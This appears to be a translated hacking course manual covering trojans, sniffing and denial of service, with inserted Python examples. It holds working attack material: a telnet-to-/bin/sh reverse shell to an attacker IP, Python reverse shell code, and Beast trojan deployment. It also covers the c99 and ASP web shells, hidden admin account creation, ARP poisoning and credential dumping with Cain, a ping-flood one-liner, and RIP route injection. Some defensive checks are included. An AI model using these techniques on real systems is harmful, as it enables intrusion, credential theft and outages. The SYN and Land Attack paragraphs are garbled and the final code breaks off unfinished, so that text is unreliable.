    Microsoft Windows 2000 [Version 5.00.2195]

    Copyright 1985-1999 Microsoft Corp.

    E:\>cd test

    cd test

    E:\test>dir /w

    dir /w

Volume in drive E has no label.

Volume Serial Number is B465-452F

    Directory of E:\test

    [.] [..] head.log NETUSERS.EXE NetView.exe

    ntcrash.zip password.txt pwdump.exe

    6 File(s) 262,499 bytes

    2 Dir(s) 191,488,000 bytes free


    C:\test>exit

    exit

    sent 20, rcvd 450: NOTSOCK

We now have a shell and control of the victim's machine. However, once the connection above ends, netcat on the victim exits as well. To make netcat listen again after each connection, use -L instead of -l. Note: -L exists only in Netcat for Windows, not in the Linux build.

2/ Using netcat for a reverse shell to bypass a firewall:

- Use telnet to connect to a listening netcat window, feed the commands from that window into the reversed telnet stream, and send the results to the other window.

Example:

- On the attacking machine (172.16.84.1), open two netcat windows listening on ports 80 and 25 respectively:

+ Netcat window (1)

C:\>nc -nvv -l -p 80

listening on [any] 80 ...

    connect to [172.16.84.1] from [172.16.84.2] 1055

    pwd

    ls -la

    _

    + ca s Netcat (2)

    C:\>nc -nvv -l -p 25

    listening on [any] 25 ...

    connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056

    /

total 171

drwxr-xr-x 17 root root 4096 Feb 5 16:15 .

drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..

drwxr-xr-x 2 root root 4096 Feb 5 08:55 bin

drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot

drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev

drwxr-xr-x 37 root root 4096 Feb 5 14:23 etc

drwxr-xr-x 6 root root 4096 Feb 5 08:58 home

drwxr-xr-x 6 root root 4096 Feb 5 08:50 lib

drwxr-xr-x 2 root root 7168 Dec 31 1969 mnt

drwxr-xr-x 4 root root 4096 Feb 5 16:18 nc

drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt

dr-xr-xr-x 61 root root 0 Feb 5 09:18 proc

drwx------ 12 root root 4096 Feb 5 16:24 root

drwxr-xr-x 2 root root 4096 Feb 5 08:55 sbin


    drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp

    drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr

    drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- On the victim machine (172.16.84.2), telnet back out to the attacking machine (172.16.84.1), using /bin/sh to execute what arrives:

    [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25

    /bin/sh: Trying: command not found

    /bin/sh: Connected: command not found

    /bin/sh: Escape: command not found

    Trying 172.16.84.1...

    Connected to 172.16.84.1.

    Escape character is '^]'.

    _

Telnet on the victim forwards everything typed in Netcat window (1), on port 80, to /bin/sh for execution. The output of /bin/sh is sent back to the attacking machine into Netcat window (2), on port 25. All you have to do is type commands in window (1) and read the results in window (2).

Ports 80 and 25 were chosen because outbound connections to them are usually not blocked by firewalls or filters.
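As an added example (not from the manual, and not netcat itself), the Python below reproduces the two-channel reverse shell just described: the "attacker" opens two listeners, the "victim" connects out to both, reads commands from the first and writes shell output to the second. Both ends run on 127.0.0.1 in one process, with OS-chosen ports standing in for 80 and 25, so it can be run offline. From the defender's side this is exactly the pattern worth alerting on: a shell process holding outbound TCP sessions to ports like 80 and 25 that carry no HTTP or SMTP.

```python
"""Two-channel reverse shell, the shape of 'telnet A 80 | /bin/sh | telnet A 25'.

Added example, not from the original manual. Both ends run on 127.0.0.1 in
one process; the listening ports are chosen by the OS instead of 80 and 25.
"""
import socket
import subprocess
import threading

HOST = "127.0.0.1"


def victim_side(cmd_port: int, out_port: int) -> None:
    """Connect OUT to the attacker twice: read commands from one socket,
    run them through the shell, write results to the other socket."""
    cmd_sock = socket.create_connection((HOST, cmd_port))
    out_sock = socket.create_connection((HOST, out_port))
    with cmd_sock, out_sock, cmd_sock.makefile("r") as commands:
        for line in commands:                # EOF from the attacker ends the loop
            line = line.strip()
            if not line:
                continue
            res = subprocess.run(line, shell=True, capture_output=True, text=True)
            out_sock.sendall((res.stdout + res.stderr).encode())


def attacker_side(commands) -> str:
    """Open the two listeners (the 'nc -l -p 80' and 'nc -l -p 25' windows),
    wait for the victim to call back, send the commands, collect the output."""
    cmd_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    out_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    for srv in (cmd_srv, out_srv):
        srv.bind((HOST, 0))                  # port 0: let the OS pick a free port
        srv.listen(1)
    cmd_port = cmd_srv.getsockname()[1]
    out_port = out_srv.getsockname()[1]

    # In a real intrusion the victim side is started by the attacker's foothold;
    # here it is a thread in the same process.
    victim = threading.Thread(target=victim_side, args=(cmd_port, out_port), daemon=True)
    victim.start()

    cmd_conn, _ = cmd_srv.accept()
    out_conn, _ = out_srv.accept()
    with cmd_srv, out_srv, cmd_conn, out_conn:
        for cmd in commands:
            cmd_conn.sendall((cmd + "\n").encode())
        cmd_conn.shutdown(socket.SHUT_WR)    # EOF on the command channel
        chunks = []
        while True:
            data = out_conn.recv(4096)
            if not data:                     # victim closed the output channel
                break
            chunks.append(data)
    victim.join(timeout=10)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(attacker_side(["echo reverse-shell-ok", "id"]))
```

Splitting command and output across two connections is what makes the telnet trick work without a full-duplex program on the victim; it also means a single connection in netstat never shows both directions of the conversation, which is why correlating all connections of a process matters more than looking at any one of them.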

Exercise 2: Using the Beast trojan and detecting the trojan.

To use the Beast trojan we must build a server file and install it on the victim's machine; that server then listens on fixed ports, and from the attacking machine we connect to the victim through those ports.

Select the Beast trojan on the CD and run the file that builds the trojan.

Additional features are available, such as AV-FW kill to disable the firewall on the target, or injecting into another file such as notepad.exe or explorer.exe as a DLL. Use the Save Server button to produce server.exe, run it on the victim, and check the victim's Task Manager to see that the trojan is actually running.


Now use the client on the attacking machine to connect to the server running on the victim's machine.

Try some of the features, such as the file manager to download the files you want from the victim, or shutting down and rebooting the victim through the Windows tab.


Defence: besides running anti-virus and anti-trojan programs, you can rely on the basic property that these trojans must open some port to the outside; you can list the open ports and their owning processes with CurrPorts or fport.


From the information CurrPorts provides you can locate and delete the file cehclass.exe and remove its entries from the registry, the startup locations and so on.

Exercise 3: Using web-based trojans

Web-based trojans are more common in the web environment: after exploiting a vulnerability and taking control of a web server, the attacker leaves behind a web-based trojan through which he can come and go on later occasions. This kind of trojan is very hard to detect, because it runs as part of the web application and calls system functions through languages such as ASP or PHP, so it cannot be spotted as easily as port-based trojans like netcat or Beast.

For this lab first install the web servers, IIS and Apache.

1/ Web-based trojan in ASP: We use the IIS web server with trojans written in this language; two representative ones are introduced, cmd.asp and zehir4.asp.

First install the IIS web service (installation is straightforward and students can do this part themselves), then copy the two files into the www directory so they can be reached over the web.


Type the dir command to view the files on the system. With a trojan like this we can view system information, upload and download through tftp, and add users to the system, for example net user hao hao /add followed by net localgroup administrators hao /add.

Open the link http://192.168.1.116/zehir4.asp to see the second web-based trojan.

This trojan is more elaborate and more convenient: fetching and deleting files is done entirely through the web, so we can easily operate on the victim's machine.

2/ Trojan in PHP: We use the Apache web server with a trojan written in this language; the representative example is c99.

First use the phpeasy package to install apache, php and mysql together (in this exercise only php and apache are needed). Copy the trojan files into the www directory so they can be run.


This is a very dangerous trojan file: it can download and upload files, run applications such as perl, execute system functions, report information about the current victim host, and more. Because of this it is very widely used by attackers (others of the same kind are r57, phpshell and so on).


Lesson 5:

SNIFFING METHODS

I/ Introduction to sniffers

A. SNIFFER OVERVIEW

A sniffer is, simply put, a program that tries to listen to the traffic flowing over a network.

Sniffers are used by network administrators as a tool for monitoring and maintaining the network. On the negative side, a sniffer is used as an eavesdropping tool to capture valuable information off the network.

On a switched network a sniffer relies on an ARP attack to get the traffic it wants redirected to it.

The exchanges between networked systems are mostly binary data, so to make sense of them a sniffer must include protocol analysis and decoding of the binary data.

Some sniffer applications in use: dsniff, snort, Cain, ettercap, Sniffer Pro.

B. HOW A SNIFFER OPERATES

On a switched network the sniffer's operation is based mainly on the ARP attack.

ARP ATTACK

1. Introduction

This is a very dangerous form of attack, called Man In The Middle. It is like having a wiretap: the session between sender and receiver proceeds normally, so the user has no idea an attack is under way.

2. Outline of the process

On the same network, when Host A and Host B want to exchange data, the packets are handed down to the data link layer for encapsulation, and each host must place the source MAC and destination MAC in the frame. So before any data is transferred, the hosts must ask for each other's MAC addresses.

If Host A starts the lookup first, it broadcasts an ARP request to all hosts asking for Host B's MAC; at that point Host B learns Host A's MAC, and only Host B replies to Host A with its own MAC (the ARP reply).

Now a Host C continuously sends ARP replies to Host A and Host B carrying Host C's MAC address but the IP addresses of Host B and Host A respectively. Host A now believes Host B's MAC is C's, so every packet Host A sends to Host B is delivered to Host C, and Host B's replies to Host A are delivered to Host C as well. If Host C has forwarding enabled, Host A and Host B remain unaware that they are under an ARP attack.


Example:

The model has the following hosts:

Attacker: the hacker's machine used for the ARP attack

IP: 10.0.0.11

MAC: 0000.0000.1011

Victim: the machine under attack

IP: 10.0.0.12

MAC: 0000.0000.1012

HostA

IP: 10.0.0.13

MAC: 0000.0000.1013

- First, HostA wants to send data to Victim and must learn Victim's MAC address to do so. HostA broadcasts an ARP Request to every machine on the LAN asking which MAC address belongs to IP 10.0.0.12 (Victim's IP).

- Both Attacker and Victim receive the ARP Request, but only Victim sends an ARP Reply back to HostA. The ARP Reply carries Victim's IP 10.0.0.12 and MAC 0000.0000.1012.

- HostA receives the ARP Reply from Victim, learns that Victim's MAC is 0000.0000.1012, and begins transferring data to Victim. Attacker cannot see the data exchanged between HostA and Victim.

Attacker now wants to run an ARP attack against Victim, so that every packet HostA sends to Victim can be captured and read.

- Attacker continuously sends ARP Replies carrying Victim's IP 10.0.0.12 but Attacker's own MAC 0000.0000.1011.

- HostA receives these ARP Replies and concludes that IP 10.0.0.12 has MAC 0000.0000.1011. HostA stores this in its ARP cache and uses it for its connections.

- From now on everything HostA sends to IP 10.0.0.12 (Victim) goes to MAC 0000.0000.1011, that is, to Attacker's machine.

(Figure: Host A, Host B and Host C)
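The following Python walks through the example above with the same addresses, as an added example that is not part of the manual: it simulates classic ARP (a cache that believes any reply addressed to it), runs HostA's normal lookup, then has Attacker poison both HostA and Victim, while a passive monitor of the kind arpwatch or ettercap's arp_cop plug-in implement watches the same packets. That monitor is the defender's check: an IP whose MAC changes, or one MAC answering for several IPs. The Host, Lan and ArpMonitor classes are my own simplification of ARP behaviour.

```python
"""ARP poisoning with the addresses from the example above, plus the check an
arpwatch-style monitor makes. Added example, not from the manual: the hosts
and LAN here are a deliberate simplification of classic ARP."""
from dataclasses import dataclass, field


@dataclass
class ArpPacket:
    op: str                      # "request" (broadcast) or "reply" (unicast)
    sender_ip: str
    sender_mac: str
    target_ip: str
    target_mac: str = "ffff.ffff.ffff"


@dataclass
class Host:
    ip: str
    mac: str
    cache: dict = field(default_factory=dict)    # ARP cache: ip -> mac

    def handle(self, pkt):
        """Classic, unauthenticated ARP: the cache trusts whatever it is told."""
        if pkt.op == "request":
            if pkt.target_ip == self.ip:
                self.cache[pkt.sender_ip] = pkt.sender_mac        # learn the asker
                return ArpPacket("reply", self.ip, self.mac, pkt.sender_ip, pkt.sender_mac)
        elif pkt.target_ip == self.ip:
            self.cache[pkt.sender_ip] = pkt.sender_mac            # any reply is believed
        return None

    def next_hop_mac(self, dst_ip):
        """MAC this host will put in the frame for dst_ip, according to its cache."""
        return self.cache.get(dst_ip)


class ArpMonitor:
    """Passive detector: remembers ip->mac bindings and alerts when a binding
    changes or one MAC claims several IPs (what arpwatch / arp_cop look for)."""

    def __init__(self):
        self.bindings = {}
        self.alerts = []

    def observe(self, pkt):
        old = self.bindings.get(pkt.sender_ip)
        if old is not None and old != pkt.sender_mac:
            self.alerts.append(f"{pkt.sender_ip} moved from {old} to {pkt.sender_mac}")
        self.bindings[pkt.sender_ip] = pkt.sender_mac
        claimed = sorted(ip for ip, mac in self.bindings.items() if mac == pkt.sender_mac)
        if len(claimed) > 1:
            self.alerts.append(f"{pkt.sender_mac} claims {claimed}")


class Lan:
    def __init__(self, *hosts):
        self.hosts = {h.mac: h for h in hosts}
        self.monitor = ArpMonitor()              # a sensor seeing all ARP on the segment

    def send(self, pkt):
        self.monitor.observe(pkt)
        if pkt.op == "request":                  # broadcast to everyone but the sender
            for h in list(self.hosts.values()):
                if h.mac != pkt.sender_mac:
                    reply = h.handle(pkt)
                    if reply:
                        self.send(reply)
        else:                                    # unicast to the frame's destination MAC
            dst = self.hosts.get(pkt.target_mac)
            if dst:
                dst.handle(pkt)


def run_scenario():
    attacker = Host("10.0.0.11", "0000.0000.1011")
    victim = Host("10.0.0.12", "0000.0000.1012")
    host_a = Host("10.0.0.13", "0000.0000.1013")
    lan = Lan(attacker, victim, host_a)

    # Step 1: normal resolution. HostA asks who has 10.0.0.12; only Victim answers.
    lan.send(ArpPacket("request", host_a.ip, host_a.mac, victim.ip))
    before = dict(host_a.cache)

    # Step 2: Attacker poisons both sides with unsolicited replies, like Host C
    # in the text: Victim's IP with Attacker's MAC to HostA, and vice versa.
    lan.send(ArpPacket("reply", victim.ip, attacker.mac, host_a.ip, host_a.mac))
    lan.send(ArpPacket("reply", host_a.ip, attacker.mac, victim.ip, victim.mac))
    return before, host_a, victim, lan.monitor.alerts


if __name__ == "__main__":
    before, host_a, victim, alerts = run_scenario()
    print("HostA cache before poisoning:", before)
    print("HostA now frames 10.0.0.12 traffic to:", host_a.next_hop_mac("10.0.0.12"))
    print("Victim now frames 10.0.0.13 traffic to:", victim.next_hop_mac("10.0.0.13"))
    for a in alerts:
        print("ALERT:", a)
```

The two sides of the poisoning are what make the "claims several IPs" alert fire; an attacker who poisons only one direction still trips the "moved from" alert, which is why the monitor keeps the first binding it saw rather than only the latest one.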


CAIN (using the CAIN program)

1. Hardware requirements:

- 10 MB of free disk space
- Operating system: Windows 2000/2003/XP
- WinPcap must be installed

2. Installation:

Click Next.


Click Next.

Click Finish.


3. Configuration

Cain & Abel needs a few settings configured; everything can be adjusted through the Configuration dialog.

Sniffer tab:

- Here we choose the network adapter used for sniffing and for the APR feature. Tick the option to enable or disable the feature.

- The sniffer works with WinPcap version 2.3 or later, which supports a very wide range of network adapters.


APR tab:

- This is where ARP poisoning is configured. By default Cain spaces the bursts of ARP packets sent to the victims 30 seconds apart. This matters because poisoning a device too aggressively can disrupt its traffic. From this dialog you set the interval between poisoning rounds: a short interval generates more ARP traffic, a long one makes the poisoning less reliable.

- In this tab pay attention to the Spoofing Options:

+ The first option uses the real MAC and IP address of the machine you are on.

+ The second option uses a spoofed IP and MAC address.

(Note that the address you pick must not collide with another machine's IP.)

Clicking the Filters and ports tab shows the protocols and the port numbers associated with each.


Filters and Ports tab:

- Here you enable or disable the TCP/UDP application ports.

HTTP Fields tab:


- Here is the list of username and password field names the HTTP sniffer uses to filter captured traffic.

- This tab shows which pieces of information the program captures from web pages:

+ Username Fields: collects anything relating to a name (user name, account, web name and so on).

+ Password Fields: collects anything relating to a password (login password, user pass, webpass and so on).

4. CAIN's applications:

+ Protected Storage Password Manager:

Protected Storage is a per-user store whose contents are encrypted with a key derived from the user's logon password, so that only its owner can read them. Several Windows applications keep credentials in this service, notably Internet Explorer, Outlook and Outlook Express; Cain can dump them.

+ Credential Manager Password Decoder:

Credential Manager lets you save user names and passwords for network resources and applications; the system then supplies them automatically on later visits without your intervention. Cain decodes these stored credentials.

+ LSA Secrets Dumper:

The LSA secrets hold, among other things, the passwords of accounts used to start services and other locally stored secrets; dial-up passwords and those of some other applications live here.

+ Dial-Up Password Decoder:


+ APR:

APR is the program's main feature. It allows sniffing on switched networks and hijacking IP traffic between hosts. APR (ARP Poison Routing) does two things: the poisoning attack, and routing the hijacked traffic on to its real destination.

APR works by manipulating the hosts' ARP handling. On an IP-over-Ethernet network, two hosts that want to communicate must know each other's MAC address. The source host looks in its ARP cache for a MAC matching the destination IP; if there is none, it broadcasts an ARP request asking for the MAC of the destination address. Because this packet is broadcast it reaches every host on the subnet, but in theory only the host owning that IP replies with its MAC. When a host receives an ARP reply addressed to it, it puts the sender's IP-to-MAC binding into its ARP cache. This is what the poisoning packets exploit.

Configuration: a few parameters need adjusting; in particular you can choose a spoofed MAC and IP address to use in the ARP poison packets. That makes the attack harder to trace, because the attacker's real addresses never appear on the wire. The attacker meanwhile sits between the two hosts and observes everything that passes.


In the figure above we want to attack the IPs from 192.168.0.1 through 192.168.0.10. The work is done as a Man-in-the-Middle: the program carries out ARP poisoning, and Cain can keep attacks against many hosts running at the same time. You must select an address in the left-hand list.

+ Service manager: from this window you can start/stop, pause/continue or remove any service on the system.


+ Sniffer:

APR-DNS:

This feature lets Cain forge DNS replies as part of the attack.

APR-DNS simply rewrites the IP address in a DNS reply. The sniffer extracts the requested name from the packet and looks it up in the list you configured; the reply's IP address is then changed to the address you chose and the packet is sent on. The client is thus deceived and connects to the destination we chose.

APR-HTTPS:


APR-HTTPS allows capturing and decrypting HTTPS traffic between hosts. It works together with the Certificate Collector tool. Note that when the victim opens an HTTPS site his browser shows a certificate warning pop-up.


    + Certificates Collector:


ETTERCAP

1. Introduction

Ettercap is a program that analyses the packets sent over a network, which also makes it an effective tool for sniffing data on a LAN, including, through its man-in-the-middle support, some sessions that use encryption. Ettercap can impersonate the MAC address of the attacked machine's network adapter: instead of being delivered to the intended machine, the packets go to the machine running ettercap and are only then passed on to the real destination.

2. Installation on Linux

Before installing, obtain the following three packages:

+ ettercap-NG-0.7.1.tar, downloadable from http://prdownloads.sourceforge.net/ettercap

+ libpcap-0.8.1.tar

+ libnet-1.1.2.1.tar, downloadable from http://www.packetfactory.net/libnet/dist/

Install libnet:

1. # tar zxvf libnet-1.1.2.1.tar.gz
2. # cd libnet
3. # ./configure
4. # make
5. # make install

Install libpcap:

6. # tar zxvf libpcap-0.8.1.tar.gz
7. # cd libpcap
8. # ./configure
9. # make
10. # make install

Install ettercap:

1. # tar zxvf ettercap-NG-0.7.1.tar.gz
2. # cd ettercap-NG-0.7.1
3. # ./configure
4. # make


5. # make install

The installation is complete; the console shows the corresponding messages.

3. Configuring and using Ettercap

- Open the Ettercap interface with the command # ettercap -C


- Before configuring, check whether the Promisc mode option is ticked; if not, tick it.

- In the Sniff menu, choose Unified sniffing...


- Choose the network adapter to use.

- To start listening, choose Start sniffing in the Start menu.


The User messages pane shows a message that the service has started.

- In the Hosts menu, choose Scan for hosts.


- In the Mitm menu, choose Arp poisoning.


- Leave the parameters empty and press Enter to skip them.

- A message appears in the User messages pane.


- To see the scanned hosts, choose Connections in the View menu.

To capture, select a connection that is active; a window with the captured packets appears, displayed as a hex dump.


- Choose Log all packets and infos in the Logging menu to save the captured packets to log files.

- To read the captured packets in readable form, run in the console: # etterlog -p -k -i ascii logfile.eci | less

4. Ettercap features

Ettercap provides a number of plug-ins; by selecting them you can use several important ettercap features.


Ettercap also has two very important plug-ins, arpcop and leech.


They let you use ettercap itself to protect your machine against other sniffers on the network.

1. Arpcop: If you suspect someone is sniffing on the network, start ettercap and select this plug-in; anyone using ettercap or dsniff can still be found, and a new window lists the machines running ARP spoofing programs on the network.

2. Leech: Once the attacking machine is identified, you can isolate it from the network immediately with this plug-in. Ettercap can also be used to find virus-infected machines that are spreading on the network, isolate them with leech, and then clean them with anti-virus software.


Lesson 6:

Denial of Service (DoS) attacks

I/ Introduction:

What is a DoS attack? (Denial of Service Attack)

A DoS attack (denial of service attack) is a very effective kind of attack: one computer connected to the Internet is enough to attack the target machine. The essence of a DoS attack is that the attacker consumes a large amount of the server's resources (bandwidth, memory, CPU, disk, ...) so that the server can no longer respond to requests from other machines (those of ordinary users), and the server may quickly stop working, crash or reboot.

The DoS attacks currently known and in use:

a.) WinNuke:

- This DoS attack only applies to machines running Windows 9x. The attacker sends packets carrying Out of Band data to port 139 of the target machine (port 139 is the NetBIOS session port; the crash is triggered by packets arriving there with the urgent flag set, that is, with Out of Band data). When the victim's machine receives such a packet, a blue error screen is shown to the victim, because the Windows code receives the packet but does not know how to react to the Out of Band data, so the system crashes.

b.) Ping of Death:

- In this DoS attack we simply send an oversized packet to the target machine through the ping command, and their system hangs.

- Example: ping -l 65000

c.) Teardrop:

- As we know, all data sent over the network from the source system to the destination system goes through two steps: the data is split into small fragments at the source, each carrying an offset value that fixes the fragment's position in the original datagram; when the fragments reach the destination, it uses the offset values to reassemble them in the original order. Exploiting this, we send the destination a series of packets whose offset values overlap. The destination cannot reassemble these packets, loses control, and may crash, reboot or stop working if the number of packets with overlapping offsets is large enough.


    d. ) SYN Attack:

    - Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ipngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi trli cc ach khng c thc v chI nhn thng tin phn hi t cc a ch ip gi . V y lcc a ch ip khng c thc, nn h thng ch s s chi v ch v cn a cc ``request``chi ny vo b nh, gy lng ph mt lng ng k b nhtrn my ch m ng ra l

    phi dng vo vic khc thay cho phi chi thng tin phn hi khng c thc ny . Nu tagi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n bcrash hoc boot my tnh . == > nm du tay .

    e . ) Land Attack:

    - _ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng cthc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vng

    lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hicn mt bn th chng bao gigi thng tin phn hi i c . == > Gy ng p lng ng .

    f.) Smurf Attack:

    - A Smurf Attack needs three components: the hacker (who orders the attack), the amplifier network (which obeys the hacker's commands) and the victim system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets carry the victim's IP address as their source IP address. When the packets reach the broadcast address of the amplifier network, the computers on that network believe that the victim computer sent them the ICMP packets, and they all reply to the victim system with ICMP response packets at once. The victim system cannot withstand the enormous volume of these packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the amplifier network multiplies the number of ICMP packets many times over; the amplification ratio depends on the number of computers on the amplifier network. The hacker's task is to take over as many networks or routers as possible that allow packets to be forwarded directly to a broadcast address without filtering the source address at the packet's exit points. With these systems in hand, the hacker can easily carry out a Smurf Attack on the systems to be attacked. ==> one machine alone is nothing to fear, but ten machines together and we give up.

    g.) UDP Flooding:

    - The UDP attack requires two systems to take part. The hacker makes his own system enter a loop exchanging data over the UDP protocol, forges the IP address of the packets as the loopback address (127.0.0.1), and sends these packets to the victim system on the UDP echo port (7). The victim system replies to the messages sent by 127.0.0.1 (itself), and the result is that it goes into an endless loop. However, many systems do not allow the loopback address to be used, so the hacker instead forges the IP address of some computer on the victim's network and floods the victim system with UDP. If you fail at this, your own machine is the one that gets hit.


    h.) DNS attack:

    - The hacker can change an entry on the victim system's Domain Name Server so that it points to some website of the hacker's. When a client asks the DNS server to resolve the compromised name into an IP address, the DNS server (whose cache the hacker has temporarily altered) immediately returns the IP address the hacker pointed it to. As a result, instead of reaching the site they wanted, the victims land on a page created by the hacker. A truly effective denial-of-service attack!

    g.) Distributed DoS Attacks (DDoS):

    - DDoS requires at least a few hackers working together. First the hackers try to break into poorly secured computer networks and install the DDoS server program on those systems. Then, at an agreed time, the hackers use the DDoS client to connect to the DDoS servers and simultaneously order those DDoS servers to launch the DDoS attack on the victim system.

    h.) DRDoS (The Distributed Reflection Denial of Service Attack):

    - This is perhaps the most powerful type of attack and the quickest way to knock out the opponent's machine. The method is similar to DDoS, but instead of attacking with many computers the attacker needs only one machine, attacking through the large servers of the world. Still using the method of spoofing the victim's IP address, the attacker sends packets to the most powerful, fastest servers with the widest bandwidth, such as Yahoo and so on, and these servers reply to the packets at the victim's address. Receiving many packets at once through these large servers quickly saturates the victim computer's link and crashes or reboots the machine. What makes this attack so powerful is that a single machine with a simple Internet connection and ordinary bandwidth can knock out any system with the best bandwidth in the world if we do not stop it in time. Our HVA web site was recently DoSed by exactly this kind of attack.

    (Quoted from Netsky (vniss))
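A defensive counterpart to the Ping of Death and Teardrop descriptions in the quoted text above, as an added example that is not part of the original material: a fragment check a host or IDS could run before reassembly, rejecting a datagram that would exceed the IPv4 size limit or fragments whose byte offsets overlap. The function names and the sample fragment lists are constructed for this illustration.

```python
# Added example (not from the original course material): a fragment sanity
# check modelled on the Ping of Death and Teardrop descriptions above.
# Fragments are given as (byte_offset, payload_length, more_fragments); the
# IPv4 header stores the offset in 8-byte units, so byte_offset = units * 8.

IPV4_MAX_DATAGRAM = 65535   # the IPv4 Total Length field is 16 bits wide
IPV4_HEADER_LEN = 20        # minimal IPv4 header without options


def split_into_fragments(payload_len, mtu_payload=1480):
    """Build the fragment list a well-behaved sender emits for a payload of
    payload_len bytes over a link carrying mtu_payload data bytes per packet.
    Used here only to construct sample input; 1480 is the usual Ethernet
    payload after a 20-byte IP header."""
    if mtu_payload % 8 != 0:
        raise ValueError("fragment payload size must be a multiple of 8")
    fragments = []
    offset = 0
    while offset < payload_len:
        length = min(mtu_payload, payload_len - offset)
        more = offset + length < payload_len
        fragments.append((offset, length, more))
        offset += length
    return fragments


def check_fragments(fragments):
    """Classify a set of fragments before reassembling them.
    Returns "ok", "bad_offset", "overlap" or "oversized"."""
    end_of_previous = 0
    # Sort by offset so each fragment can be compared with the one before it
    for offset, length, _more in sorted(fragments, key=lambda f: f[0]):
        if offset % 8 != 0:
            return "bad_offset"     # not representable in a real IPv4 header
        if offset < end_of_previous:
            return "overlap"        # Teardrop: offset overlaps the previous fragment
        end_of_previous = offset + length
        if IPV4_HEADER_LEN + end_of_previous > IPV4_MAX_DATAGRAM:
            return "oversized"      # Ping of Death: reassembled datagram too large
    return "ok"


# Constructed samples: an ordinary large ping, a ping that reassembles past
# the 65535-byte limit, and two Teardrop-style fragments with overlapping offsets.
LARGE_PING = split_into_fragments(8 + 65000)    # 8-byte ICMP header + 65000 data bytes
PING_OF_DEATH = split_into_fragments(8 + 65520)
TEARDROP = [(0, 36, True), (24, 40, False)]

if __name__ == "__main__":
    samples = [("large ping", LARGE_PING), ("ping of death", PING_OF_DEATH),
               ("teardrop", TEARDROP)]
    for name, frags in samples:
        print(f"{name}: {check_fragments(frags)}")
```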

    II/ Lab description:

    Lab 1: DoS using Ping of Death.

    Besides using tools such as Nemesy, the following command can also be used to launch a ping of death:

    For /L %i in (1,1,100) do start ping [ip victim] -l 10000 -t


    This command can be run several times and can take the client machine down completely.


    Lab 2: DoS against a protocol with no authentication (this lab uses RIP)

    In this lab we use a Cisco router running RIP version 1 and the Nemesis tool, run from a Linux boot CD, to inject RIP update messages into the router. When the router receives an update message it stores it in its routing table. We can therefore run Nemesis many times and fill up the router's memory.

    First try the following command: nemesis rip -V 1 -c 2 -i 192.168.5.0 -S 192.168.1.51 -D 192.168.1.254

    Here -V 1 means we are using RIP version 1, -c 2 is the update message, -i 192.168.5.0 is the route we advertise, -S 192.168.1.51 is the source address of the information (it need not be the PC's own address), and -D 192.168.1.254 is the address of fa0/0 on router VSIC1. After running this command, check on the router whether this route is present, then write a script containing different routes and run the script.


    Figure: injecting packets into the router


    Figure: the router's memory overflows

    Figure: the router's routing table during the attack

    So by injecting update messages into a protocol without authentication, we can stop the router from working. This shows how important authentication is. Nemesis has many more options for protocols such as ARP, OSPF and so on. Students can test the remaining protocols themselves.
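An added example (not part of the original lab or of Nemesis) of what a receiver-side check against the injected RIP updates above looks like: it parses a RIP datagram, flags version 1 messages (which cannot carry authentication), responses from sources that are not configured neighbours, and advertised prefixes outside the expected set. The sample datagram is constructed to match the nemesis command in the text; the function names and the neighbour and prefix lists are assumptions.

```python
import ipaddress
import struct

# Added example (not part of the lab or of Nemesis): a receiver-side audit of
# RIP datagrams such as the ones injected above. Names and the neighbour and
# prefix lists are assumptions made for this illustration.

RIP_RESPONSE = 2      # command 2: a Response, the message type that installs routes
AUTH_AFI = 0xFFFF     # RIPv2 authentication entry marker (RFC 2453)
ENTRY_LEN = 20        # every RIP entry is 20 bytes


def build_rip_v1_response(routes):
    """Constructed sample: the RIPv1 Response that a 'nemesis rip -V 1 -c 2'
    run produces, with one entry per (prefix, metric)."""
    msg = struct.pack("!BBH", RIP_RESPONSE, 1, 0)
    for prefix, metric in routes:
        addr = int(ipaddress.IPv4Address(prefix))
        # RIPv1 entry: AFI=2 (IP), must-be-zero, address, zero, zero, metric
        msg += struct.pack("!HHIIII", 2, 0, addr, 0, 0, metric)
    return msg


def audit_rip_update(src_ip, payload, trusted_neighbours, expected_prefixes):
    """Return the list of findings for one RIP datagram received from src_ip.
    An empty list means the update looks like one the router should accept."""
    if len(payload) < 4 or (len(payload) - 4) % ENTRY_LEN != 0:
        return ["malformed_length"]
    command, version, _zero = struct.unpack("!BBH", payload[:4])
    if command != RIP_RESPONSE:
        return []                        # Requests do not change the routing table
    findings = []
    if src_ip not in trusted_neighbours:
        findings.append("untrusted_source")
    if version == 1:
        # Version 1 has no authentication entry at all, so nothing in the
        # message can prove who sent it; the lab exploits exactly this.
        findings.append("ripv1_cannot_authenticate")
    has_auth_entry = False
    for pos in range(4, len(payload), ENTRY_LEN):
        entry = payload[pos:pos + ENTRY_LEN]
        afi = struct.unpack("!H", entry[:2])[0]
        if afi == AUTH_AFI:
            has_auth_entry = True        # v2 plaintext or MD5 authentication entry
            continue
        _afi, _tag, addr, _mask, _nexthop, metric = struct.unpack("!HHIIII", entry)
        prefix = str(ipaddress.IPv4Address(addr))
        if prefix not in expected_prefixes:
            findings.append("unexpected_prefix:" + prefix)
        if not 1 <= metric <= 16:        # 16 means unreachable; 0 and >16 are invalid
            findings.append("invalid_metric:" + prefix)
    if version == 2 and not has_auth_entry:
        findings.append("v2_unauthenticated")
    return findings


# Constructed scenario mirroring the text: the router trusts only its real
# RIP neighbour and expects only the lab's own prefix to be advertised.
TRUSTED = {"192.168.1.1"}
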